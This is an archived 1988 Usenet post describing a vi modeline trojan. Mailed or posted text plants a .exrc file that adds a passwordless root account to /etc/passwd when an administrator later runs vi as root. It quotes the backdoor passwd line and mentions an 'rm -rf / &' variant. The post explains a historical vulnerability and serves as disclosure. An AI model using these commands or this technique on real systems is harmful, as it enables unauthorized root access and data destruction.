Xref: utzoo news.sysadmin:1840 comp.unix.wizards:13215 Path: utzoo!utgpu!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!bloom-beacon!bu-cs!encore!gloom!cory From: cory@gloom.UUCP (Cory Kempf) Newsgroups: news.sysadmin,comp.unix.wizards Subject: Re: Trojan horse possible with news readers Summary: How to break in with mail/news to root... Message-ID: <229@gloom.UUCP> Date: 6 Dec 88 15:39:03 GMT References: <6775@rosevax.Rosemount.COM> Organization: Alloy Computer Products, Framingham, Mass. Lines: 30 a few days ago, I posted an article in which I implied that it would be possible to get root access to a machine just by sending mail or posting an article that was replied to. This article wasn't supposed to make it out, but it did anyway. (damned cancel didn't work) Anyway, a number of people have written asking how this worked. the Sysadmin, while not root (UID=user) read news/mail and replies. the default editor is vi. The last few lines of the letter/article contain lines of the sort<:>cmd<:>. The last of these lines causes all lines beginning with <:> to be deleted. The rest create/modify the .exrc file in the CURRENT working directory (if write access is allowed) to probe for write access to /etc/passwd, and if it is allowed, include a line like "suser::0:0:Super User:/:/bin/csh" into the /etc/passwd file. So, when the Sysadmin su's to root, and then executes vi, vi looks in the CURRENT working directory for a file named .exrc, and executes that. And that is how the vi's modelines bug can be exploited to give root access even if you never read news/mail as root (nb: instead of modifyin the /etc/passwd file, it could just check the UID, and if it is 0 do an 'rm -rf / &' +C -- Cory (the last person to escape alive from riverside) Kempf UUCP: encore.com!gloom!cory "...it's a mistake in the making." -KT